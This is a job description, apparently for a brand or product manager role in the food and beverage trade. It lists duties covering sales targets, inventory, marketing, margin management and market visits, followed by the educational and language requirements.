Job Description

Sales
To ensure planned sales are achieved by working closely with the sales team, strategizing, identifying gaps and proactively taking actions to fill these gaps.
Spot opportunities and develop plans to turn these opportunities to sales.
Inventory Management
To ensure accurate forecasting by buying the right products at the right time, maintaining the desired weeks of supply.
To manage aged stock and write off, continuous improvement on last year and Plan.
To ensure a balance inventory, no major over or under stock.

Marketing
Build brand awareness, through public relation activities.
Build a yearly promotional calendar and work with sales team to ensure best in class execution.
Manage and negotiate for promotional funds
Prepare marketing plans for new brand or product launches.
Measure ROI for all promotions executed.
Gross Margin Management
Manage mark down and indiscriminate discounting.
Manage product sales mix to maximise weighted gross margin.
Good negotiation for the desired margin
Execute price increases wherever possible.
Ensure a balanced inventory is in practise.

Others
To conduct regular market visits
To gather market intelligence relating to the product on a quarterly basis
Twice a year presentation to key accounts on marketing strategy and plans would be required.
Establish a close working relationship with the Sales team.

Requirement
Tertiary/Diploma or Degree in Business Administration/Marketing or equivalent
F&B background
Good command of English
